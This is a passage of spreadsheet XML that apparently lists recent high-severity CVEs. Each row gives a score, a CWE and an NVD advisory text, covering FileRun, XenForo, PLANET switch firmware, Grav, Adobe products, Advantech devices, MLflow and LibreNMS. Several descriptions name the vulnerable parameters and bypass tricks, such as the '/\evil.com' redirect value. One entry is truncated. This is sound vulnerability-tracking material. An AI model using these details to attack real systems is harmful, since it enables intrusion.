      <c r="B1435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73694</t>
        </is>
      </c>
      <c r="C1435" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1435" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1435" s="5" t="inlineStr"/>
      <c r="F1435" s="5" t="inlineStr"/>
      <c r="G1435" s="5" t="inlineStr"/>
      <c r="H1435" s="5" t="inlineStr"/>
      <c r="I1435" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1435" s="5" t="inlineStr"/>
      <c r="K1435" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1435" s="5" t="inlineStr">
        <is>
          <t>FileRun before 2026.3.0 contains an OS command injection vulnerability caused by a no-op redefinition of escapeshellcmd() in CLI.php that strips shell-metacharacter escaping, allowing attacker-controlled input to reach an exec() sink unsanitized. Attackers can exploit this through an interactive path via image_preview.php with a crafted args parameter requiring superuser authentication, or through a persistent path by storing malicious payloads in thumbnails_ffmpeg_args or thumbnails_ffmpeg_ss that execute when any user triggers video thumbnail generation.</t>
        </is>
      </c>
      <c r="M1435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73694</t>
        </is>
      </c>
    </row>
    <row r="1436">
      <c r="A1436" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73698</t>
        </is>
      </c>
      <c r="C1436" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1436" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1436" s="5" t="inlineStr"/>
      <c r="F1436" s="5" t="inlineStr"/>
      <c r="G1436" s="5" t="inlineStr"/>
      <c r="H1436" s="5" t="inlineStr"/>
      <c r="I1436" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1436" s="5" t="inlineStr"/>
      <c r="K1436" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1436" s="5" t="inlineStr">
        <is>
          <t>FileRun before 2026.3.0 contains a SQL injection vulnerability that allows delegated or simple administrators to execute arbitrary SQL by submitting the description parameter as an array, causing the getValuesString() method in DB/DP.php to interpolate raw array values directly into an INSERT statement without parameterization. Because the underlying PDO connection uses emulated prepared statements enabling stacked queries, attackers can manipulate the df_users_permissions table to escalate a delegated administrator account to superuser privileges, and may additionally achieve code execution via unsanitized path values passed to require_once in the logs listing component.</t>
        </is>
      </c>
      <c r="M1436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73698</t>
        </is>
      </c>
    </row>
    <row r="1437">
      <c r="A1437" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73699</t>
        </is>
      </c>
      <c r="C1437" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1437" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1437" s="5" t="inlineStr"/>
      <c r="F1437" s="5" t="inlineStr"/>
      <c r="G1437" s="5" t="inlineStr"/>
      <c r="H1437" s="5" t="inlineStr"/>
      <c r="I1437" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1437" s="5" t="inlineStr"/>
      <c r="K1437" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1437" s="5" t="inlineStr">
        <is>
          <t>FileRun before 2026.3.0 contains a PHP object injection vulnerability that allows authenticated attackers to execute arbitrary code by exploiting incorrect options passed to unserialize() in the Perms::getPerms() method, where a positional array is used instead of the required named-key array to disable class instantiation. Attackers with database write access can inject a serialized gadget chain into the permissions table columns processed on every authenticated page load to write arbitrary files, such as PHP webshells, to web-accessible paths.</t>
        </is>
      </c>
      <c r="M1437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73699</t>
        </is>
      </c>
    </row>
    <row r="1438">
      <c r="A1438" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74239</t>
        </is>
      </c>
      <c r="C1438" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1438" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1438" s="5" t="inlineStr"/>
      <c r="F1438" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1438" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1438" s="5" t="inlineStr"/>
      <c r="I1438" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1438" s="5" t="inlineStr"/>
      <c r="K1438" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1438" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a path traversal vulnerability in the style archive importer on Windows deployments that allows authenticated non-super administrators with style permissions to write arbitrary files outside the intended extraction directory by using backslash-based traversal sequences in ZIP member names. Attackers can craft a malicious ZIP archive with backslash path separators that bypass forward-slash validation to write arbitrary bytes to any web-server-writable path, including the public web root, achieving persistent code execution as the web-server account.</t>
        </is>
      </c>
      <c r="M1438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74239</t>
        </is>
      </c>
    </row>
    <row r="1439">
      <c r="A1439" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75121</t>
        </is>
      </c>
      <c r="C1439" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1439" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1439" s="5" t="inlineStr"/>
      <c r="F1439" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1439" s="5" t="inlineStr"/>
      <c r="H1439" s="5" t="inlineStr"/>
      <c r="I1439" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1439" s="5" t="inlineStr"/>
      <c r="K1439" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1439" s="5" t="inlineStr">
        <is>
          <t>PLANET GS-4210-16P2S V3 firmware before 3.441b260626 contains an authenticated OS command injection vulnerability in /cgi-bin/dispatcher.cgi. The web_vlan_membership_edit_dialog_post handler incorporates the memberTags POST parameter into a shell command without sanitization. A remote authenticated attacker can send a crafted memberTags value to execute arbitrary operating-system commands on the device.</t>
        </is>
      </c>
      <c r="M1439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75121</t>
        </is>
      </c>
    </row>
    <row r="1440">
      <c r="A1440" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75122</t>
        </is>
      </c>
      <c r="C1440" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1440" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1440" s="5" t="inlineStr"/>
      <c r="F1440" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1440" s="5" t="inlineStr"/>
      <c r="H1440" s="5" t="inlineStr"/>
      <c r="I1440" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1440" s="5" t="inlineStr"/>
      <c r="K1440" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1440" s="5" t="inlineStr">
        <is>
          <t>PLANET GS-4210-16P2S V3 firmware before 3.441b260626 contains an authenticated OS command injection vulnerability in /cgi-bin/httpuploadcert.cgi. The certificate password field in a certificate upload request is incorporated into a shell command without sanitization of shell metacharacters. A remote attacker with administrator web credentials can submit a crafted certificate upload request to execute arbitrary operating-system commands on the device.</t>
        </is>
      </c>
      <c r="M1440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75122</t>
        </is>
      </c>
    </row>
    <row r="1441">
      <c r="A1441" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75123</t>
        </is>
      </c>
      <c r="C1441" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1441" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1441" s="5" t="inlineStr"/>
      <c r="F1441" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1441" s="5" t="inlineStr"/>
      <c r="H1441" s="5" t="inlineStr"/>
      <c r="I1441" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1441" s="5" t="inlineStr"/>
      <c r="K1441" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1441" s="5" t="inlineStr">
        <is>
          <t>PLANET GS-4210-16P2S V3 firmware before 3.441b260626 contains an authenticated OS command injection vulnerability in /cgi-bin/dispatcher.cgi. The web_smtp_test_post handler incorporates a caller-supplied SMTP server value directly into a shell command without sanitization. A remote attacker with administrator web credentials can send a crafted SMTP server value to execute arbitrary operating-system commands on the device.</t>
        </is>
      </c>
      <c r="M1441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75123</t>
        </is>
      </c>
    </row>
    <row r="1442">
      <c r="A1442" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75829</t>
        </is>
      </c>
      <c r="C1442" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1442" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1442" s="5" t="inlineStr"/>
      <c r="F1442" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1442" s="5" t="inlineStr"/>
      <c r="H1442" s="5" t="inlineStr"/>
      <c r="I1442" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1442" s="5" t="inlineStr"/>
      <c r="K1442" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L1442" s="5" t="inlineStr">
        <is>
          <t>grav-plugi</t>
        </is>
      </c>
      <c r="M1442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75829</t>
        </is>
      </c>
    </row>
    <row r="1443">
      <c r="A1443" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75833</t>
        </is>
      </c>
      <c r="C1443" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1443" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1443" s="5" t="inlineStr"/>
      <c r="F1443" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1443" s="5" t="inlineStr"/>
      <c r="H1443" s="5" t="inlineStr"/>
      <c r="I1443" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1443" s="5" t="inlineStr"/>
      <c r="K1443" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L1443" s="5" t="inlineStr">
        <is>
          <t>The Grav API plugin (getgrav/grav-plugin-api, bundled with Grav 2.0's admin-next/API stack) before version 1.0.14 contains an open redirect weakness in SsoController::sanitizeReturnTo(). The function rejects a literal '//' prefix but does not account for browsers normalizing backslashes to slashes in special (http/https) schemes, so a returnTo value such as '/\evil.com' passes the guard and is later resolved by the browser as the protocol-relative URL '//evil.com'. Following a legitimate OAuth login flow, an attacker-supplied returnTo parameter could redirect an authenticated victim to an attacker-controlled site for post-login phishing. Full browser-side exploitability depends on the admin-next SPA's client-side oauth-callback handler and was not independently verified by the reporter.</t>
        </is>
      </c>
      <c r="M1443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75833</t>
        </is>
      </c>
    </row>
    <row r="1444">
      <c r="A1444" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75990</t>
        </is>
      </c>
      <c r="C1444" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1444" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1444" s="5" t="inlineStr"/>
      <c r="F1444" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1444" s="5" t="inlineStr"/>
      <c r="H1444" s="5" t="inlineStr"/>
      <c r="I1444" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1444" s="5" t="inlineStr"/>
      <c r="K1444" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1444" s="5" t="inlineStr">
        <is>
          <t>Illustrator is affected by an Incorrect Authorization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M1444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75990</t>
        </is>
      </c>
    </row>
    <row r="1445">
      <c r="A1445" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75991</t>
        </is>
      </c>
      <c r="C1445" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1445" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1445" s="5" t="inlineStr"/>
      <c r="F1445" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1445" s="5" t="inlineStr"/>
      <c r="H1445" s="5" t="inlineStr"/>
      <c r="I1445" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1445" s="5" t="inlineStr"/>
      <c r="K1445" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1445" s="5" t="inlineStr">
        <is>
          <t>Illustrator is affected by an Improper Input Validation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M1445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75991</t>
        </is>
      </c>
    </row>
    <row r="1446">
      <c r="A1446" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76190</t>
        </is>
      </c>
      <c r="C1446" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1446" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1446" s="5" t="inlineStr"/>
      <c r="F1446" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1446" s="5" t="inlineStr"/>
      <c r="H1446" s="5" t="inlineStr"/>
      <c r="I1446" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1446" s="5" t="inlineStr"/>
      <c r="K1446" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L1446" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M1446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76190</t>
        </is>
      </c>
    </row>
    <row r="1447">
      <c r="A1447" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76199</t>
        </is>
      </c>
      <c r="C1447" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1447" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1447" s="5" t="inlineStr"/>
      <c r="F1447" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1447" s="5" t="inlineStr"/>
      <c r="H1447" s="5" t="inlineStr"/>
      <c r="I1447" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1447" s="5" t="inlineStr"/>
      <c r="K1447" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="L1447" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by an Uncontrolled Search Path Element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M1447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76199</t>
        </is>
      </c>
    </row>
    <row r="1448">
      <c r="A1448" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77109</t>
        </is>
      </c>
      <c r="C1448" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1448" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1448" s="5" t="inlineStr"/>
      <c r="F1448" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1448" s="5" t="inlineStr"/>
      <c r="H1448" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="I1448" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1448" s="5" t="inlineStr"/>
      <c r="K1448" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1448" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain elevated access to restricted resources. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M1448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77109</t>
        </is>
      </c>
    </row>
    <row r="1449">
      <c r="A1449" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77774</t>
        </is>
      </c>
      <c r="C1449" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1449" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1449" s="5" t="inlineStr"/>
      <c r="F1449" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1449" s="5" t="inlineStr"/>
      <c r="H1449" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="I1449" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1449" s="5" t="inlineStr"/>
      <c r="K1449" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1449" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized read access. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M1449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77774</t>
        </is>
      </c>
    </row>
    <row r="1450">
      <c r="A1450" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78302</t>
        </is>
      </c>
      <c r="C1450" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1450" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1450" s="5" t="inlineStr"/>
      <c r="F1450" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1450" s="5" t="inlineStr"/>
      <c r="H1450" s="5" t="inlineStr"/>
      <c r="I1450" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1450" s="5" t="inlineStr"/>
      <c r="K1450" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1450" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - joomshaper.com - Unauthenticated Stored Cross-Site Scripting (XSS) via Unescaped Output in Views and Admin Lists in SP Property &lt; 4.1.4 - Multiple template files across frontend views and administrator list tables rendered attributes and text values directly into HTML without contextual escaping.</t>
        </is>
      </c>
      <c r="M1450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78302</t>
        </is>
      </c>
    </row>
    <row r="1451">
      <c r="A1451" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79322</t>
        </is>
      </c>
      <c r="C1451" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1451" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1451" s="5" t="inlineStr"/>
      <c r="F1451" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1451" s="5" t="inlineStr"/>
      <c r="H1451" s="5" t="inlineStr">
        <is>
          <t>mageplaza:mageplaza_blog</t>
        </is>
      </c>
      <c r="I1451" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1451" s="5" t="inlineStr"/>
      <c r="K1451" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1451" s="5" t="inlineStr">
        <is>
          <t>SQL injection in the RelatedProduct block in Mageplaza Blog for Magento 2 (mageplaza/magento-2-blog-extension) through 4.3.2 allows remote unauthenticated attackers to execute arbitrary SQL commands and read arbitrary database contents via the id parameter to /mpblog/post/view.</t>
        </is>
      </c>
      <c r="M1451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79322</t>
        </is>
      </c>
    </row>
    <row r="1452">
      <c r="A1452" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79697</t>
        </is>
      </c>
      <c r="C1452" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1452" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1452" s="5" t="inlineStr"/>
      <c r="F1452" s="5" t="n">
        <v>0.034</v>
      </c>
      <c r="G1452" s="5" t="inlineStr"/>
      <c r="H1452" s="5" t="inlineStr"/>
      <c r="I1452" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1452" s="5" t="inlineStr"/>
      <c r="K1452" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="L1452" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Advantech WISE-6610-NB, WISE-6610-EB, WISE-6610-TB, WISE-6610-JB, WISE-6610-CB, WISE-6610-EL-NB, WISE-6610-EL-EB, WISE-6610-EL-TB, WISE-6610-EL-JB, WISE-6610-EL-CB, WISE-6610P-DEA, WISE-6610P-DNA and WISE-6610P-DTA 1.2.1_20251110. This affects the function basicstation_apply of the component Basic Station Certificate-Deletion Handler. This manipulation of the argument act causes command injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. Upgrading to version 1.2.4_20260821 is able to mitigate this issue. Upgrading the affected component is advised. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.</t>
        </is>
      </c>
      <c r="M1452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79697</t>
        </is>
      </c>
    </row>
    <row r="1453">
      <c r="A1453" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79698</t>
        </is>
      </c>
      <c r="C1453" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1453" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1453" s="5" t="inlineStr"/>
      <c r="F1453" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G1453" s="5" t="inlineStr"/>
      <c r="H1453" s="5" t="inlineStr"/>
      <c r="I1453" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1453" s="5" t="inlineStr"/>
      <c r="K1453" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="L1453" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Advantech WISE-6610-NB, WISE-6610-EB, WISE-6610-TB, WISE-6610-JB, WISE-6610-CB, WISE-6610-EL-NB, WISE-6610-EL-EB, WISE-6610-EL-TB, WISE-6610-EL-JB, WISE-6610-EL-CB, WISE-6610P-DEA, WISE-6610P-DNA and WISE-6610P-DTA 1.2.1_20251110. This vulnerability affects the function nodered_lib_apply of the component Node-RED Library. Such manipulation of the argument act leads to command injection. The attack can be launched remotely. The exploit is publicly available and might be used. Upgrading to version 1.2.4_20260821 is able to resolve this issue. It is advisable to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.</t>
        </is>
      </c>
      <c r="M1453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79698</t>
        </is>
      </c>
    </row>
    <row r="1454">
      <c r="A1454" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79721</t>
        </is>
      </c>
      <c r="C1454" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1454" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1454" s="5" t="inlineStr"/>
      <c r="F1454" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1454" s="5" t="inlineStr"/>
      <c r="H1454" s="5" t="inlineStr"/>
      <c r="I1454" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1454" s="5" t="inlineStr"/>
      <c r="K1454" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="L1454" s="5" t="inlineStr">
        <is>
          <t>Code execution can occur in versions of the MLflow platform running version 0.0.1 or newer, enabling a maliciously crafted model artifact to execute arbitrary code on an end user's system when loaded by the project.</t>
        </is>
      </c>
      <c r="M1454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79721</t>
        </is>
      </c>
    </row>
    <row r="1455">
      <c r="A1455" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80097</t>
        </is>
      </c>
      <c r="C1455" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1455" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1455" s="5" t="inlineStr"/>
      <c r="F1455" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1455" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1455" s="5" t="inlineStr"/>
      <c r="I1455" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1455" s="5" t="inlineStr"/>
      <c r="K1455" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1455" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in Microsoft Authenticator allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80097</t>
        </is>
      </c>
    </row>
    <row r="1456">
      <c r="A1456" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80214</t>
        </is>
      </c>
      <c r="C1456" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1456" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1456" s="5" t="inlineStr"/>
      <c r="F1456" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1456" s="5" t="inlineStr"/>
      <c r="H1456" s="5" t="inlineStr"/>
      <c r="I1456" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1456" s="5" t="inlineStr"/>
      <c r="K1456" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1456" s="5" t="inlineStr">
        <is>
          <t>LibreNMS’s Virtualization Discovery module is vulnerable to command line injection. An authenticated admin user can execute arbitrary code on the host server.</t>
